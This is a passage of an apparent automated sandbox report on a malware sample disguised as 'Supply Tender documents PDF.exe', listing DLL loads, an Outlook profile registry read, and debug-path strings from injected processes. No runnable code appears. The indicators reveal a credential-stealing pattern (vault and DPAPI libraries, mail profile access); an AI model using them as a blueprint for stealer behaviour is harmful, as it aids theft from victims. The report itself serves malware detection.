Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mfplat.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: rtworkq.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.devices.perception.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mediafoundation.defaultperceptionprovider.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: structuredquery.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: icu.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: mswb7.dll
Source: C:\Windows\System32\SensorDataService.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: mfcore.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: mfplat.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: ksuser.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: mfperfhelper.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: rtworkq.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mfpmp.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\snmptrap.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: spectrumsyncclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: perceptionsimulationextensions.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: hid.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: holographicruntimes.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: perceptiondevice.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: spatialstore.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: esent.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: analogcommonproxystub.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: structuredquery.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: windows.globalization.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: bcp47mrm.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: icu.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: mswb7.dll
Source: C:\Windows\System32\Spectrum.exe	Section loaded: devdispitemprovider.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh-agent.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: esent.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\TieringEngineService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: version.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\AgentService.exe	Section loaded: appmanagementconfiguration.dll
Source: C:\Windows\System32\vds.exe	Section loaded: atl.dll
Source: C:\Windows\System32\vds.exe	Section loaded: osuninst.dll
Source: C:\Windows\System32\vds.exe	Section loaded: vdsutil.dll
Source: C:\Windows\System32\vds.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\vds.exe	Section loaded: uexfat.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ulib.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ifsutil.dll
Source: C:\Windows\System32\vds.exe	Section loaded: devobj.dll
Source: C:\Windows\System32\vds.exe	Section loaded: uudf.dll
Source: C:\Windows\System32\vds.exe	Section loaded: untfs.dll
Source: C:\Windows\System32\vds.exe	Section loaded: ufat.dll
Source: C:\Windows\System32\vds.exe	Section loaded: fmifs.dll
Source: C:\Windows\System32\vds.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: virtdisk.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: bcd.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: spp.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: wer.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: fltlib.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: fveapi.dll
Source: C:\Windows\System32\wbengine.exe	Section loaded: cscapi.dll
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\SnEcyANdTXCGXkHDSwbShDGSoZoquLpYSAdTSfWEdzneGPgvWvKpdMBkMItdPzntNmCuEWHvj\NSSASn0WvLKV.exe	Section loaded: rasadhlp.dll

Source: C:\Windows\System32\msdtc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mfpmp.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: Supply Tender documents PDF.exe

Static file information: File size 1771008 > 1048576

Source: Supply Tender documents PDF.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: armsvc.exe, 00000001.00000003.1769006173.00000000009A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Supply Tender documents PDF.exe, 00000000.00000003.1149511448.0000000003EC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdb source: armsvc.exe, 00000001.00000003.1231003813.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: armsvc.exe, 00000001.00000003.1822943236.00000000009C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1834169268.0000000000630000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821702415.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: armsvc.exe, 00000001.00000003.1494485618.0000000001A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdb source: armsvc.exe, 00000001.00000003.1342114265.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: armsvc.exe, 00000001.00000003.1626565543.0000000001C00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: armsvc.exe, 00000001.00000003.1626565543.0000000001C00000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: armsvc.exe, 00000001.00000003.1231003813.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdb source: armsvc.exe, 00000001.00000003.1642730823.0000000001BF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: armsvc.exe, 00000001.00000003.1176733295.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: armsvc.exe, 00000001.00000003.1869274891.0000000000950000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1874001903.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: armsvc.exe, 00000001.00000003.1238642875.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MFPMP.pdbUGP source: svchost.exe, 00000005.00000003.1335036784.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1335134675.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1333051827.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, NSSASn0WvLKV.exe, 00000014.00000003.1306502158.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: mouslingly.exe, 00000003.00000003.1174898712.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, mouslingly.exe, 00000003.00000003.1175119323.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000005.00000002.1375534360.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1375534360.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1254013371.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1256763033.0000000003100000.00000004.00000020.00020000.00000000.sdmp, mouslingly.exe, 00000016.00000003.1310619898.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, mouslingly.exe, 00000016.00000003.1312678889.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2443234960.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000003.1375438357.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2443234960.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000003.1367538170.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.1402216539.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.1402216539.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.1389887586.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000003.1393035497.0000000003100000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: armsvc.exe, 00000001.00000003.1591314165.00000000019B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: armsvc.exe, 00000001.00000003.1269224153.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdb source: armsvc.exe, 00000001.00000003.1269224153.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: armsvc.exe, 00000001.00000003.1857034513.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: armsvc.exe, 00000001.00000003.1776217424.0000000000910000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1783962032.0000000000630000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: mfpmp.exe, 00000018.00000002.2453813706.000000000347C000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2414107394.0000000002988000.00000004.00000020.00020000.00000000.sdmp, NSSASn0WvLKV.exe, 00000026.00000002.2445046656.000000000288C000.00000004.00000001.00040000.00000000.sdmp
Source:	Binary string: WmiApSrv.pdbGCTL source: armsvc.exe, 00000001.00000003.1424612524.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: mfpmp.exe, 00000018.00000002.2453813706.000000000347C000.00000004.10000000.00040000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2414107394.0000000002988000.00000004.00000020.00020000.00000000.sdmp, NSSASn0WvLKV.exe, 00000026.00000002.2445046656.000000000288C000.00000004.00000001.00040000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: armsvc.exe, 00000001.00000003.1670053737.0000000001BF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb((( source: armsvc.exe, 00000001.00000003.1504523287.0000000001A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: locator.pdb source: armsvc.exe, 00000001.00000003.1265153504.0000000001A30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1260014174.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: armsvc.exe, 00000001.00000003.1160283828.0000000001A70000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ADelRCP_Exec.pdbCC9 source: armsvc.exe, 00000001.00000003.1642730823.0000000001BF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: armsvc.exe, 00000001.00000003.1516990846.0000000001A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Acrobat_SL.pdb source: armsvc.exe, 00000001.00000003.1504523287.0000000001A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: armsvc.exe, 00000001.00000003.1822943236.00000000009C0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1834169268.0000000000630000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1821702415.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: armsvc.exe, 00000001.00000003.1591314165.00000000019B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: armsvc.exe, 00000001.00000003.1692671371.00000000019A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: armsvc.exe, 00000001.00000003.1494485618.0000000001A60000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdb source: armsvc.exe, 00000001.00000003.1869274891.0000000000950000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1874001903.0000000000960000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 64BitMAPIBroker.pdb source: armsvc.exe, 00000001.00000003.1752430570.00000000019C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: snmptrap.pdbGCTL source: armsvc.exe, 00000001.00000003.1298716234.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msdtcexe.pdbGCTL source: armsvc.exe, 00000001.00000003.1222505095.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: maintenanceservice.pdb source: armsvc.exe, 00000001.00000003.1214543207.0000000001DB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdbGCTL source: armsvc.exe, 00000001.00000003.1238642875.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: armsvc.exe, 00000001.00000003.1857034513.00000000009B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdbGCTL source: armsvc.exe, 00000001.00000003.1256309080.0000000001A30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1243094689.0000000001B10000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1243749130.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: NSSASn0WvLKV.exe, 00000014.00000000.1283174299.000000000074F000.00000002.00000001.01000000.00000008.sdmp, NSSASn0WvLKV.exe, 00000026.00000000.1452672566.000000000074F000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: armsvc.exe, 00000001.00000003.1733215180.0000000001980000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ADNotificationManager\Viewer Release_x64\ADNotificationManager.pdb source: ADNotificationManager.exe.1.dr
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: armsvc.exe, 00000001.00000003.1670053737.0000000001BF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: armsvc.exe, 00000001.00000003.1692671371.00000000019A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: armsvc.exe, 00000001.00000003.1769006173.00000000009A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerfHost.pdb source: armsvc.exe, 00000001.00000003.1256309080.0000000001A30000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1243094689.0000000001B10000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1243749130.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: armsvc.exe, 00000001.00000003.1737492104.0000000001BE0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MFPMP.pdb source: svchost.exe, 00000005.00000003.1335036784.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1335134675.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1333051827.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, NSSASn0WvLKV.exe, 00000014.00000003.1306502158.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\klist_objs\klist.pdb source: klist.exe.1.dr
Source:	Binary string: maintenanceservice.pdb` source: armsvc.exe, 00000001.00000003.1214543207.0000000001DB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: armsvc.exe, 00000001.00000003.1776217424.0000000000910000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000001.00000003.1783962032.0000000000630000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: mouslingly.exe, 00000003.00000003.1174898712.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, mouslingly.exe, 00000003.00000003.1175119323.0000000004BC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1375534360.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.1375534360.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1254013371.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.1256763033.0000000003100000.00000004.00000020.00020000.00000000.sdmp, mouslingly.exe, 00000016.00000003.1310619898.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, mouslingly.exe, 00000016.00000003.1312678889.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2443234960.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000003.1375438357.0000000002CA4000.00000004.00000020.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000002.2443234960.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, mfpmp.exe, 00000018.00000003.1367538170.0000000002AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.1402216539.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000019.00000002.1402216539.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 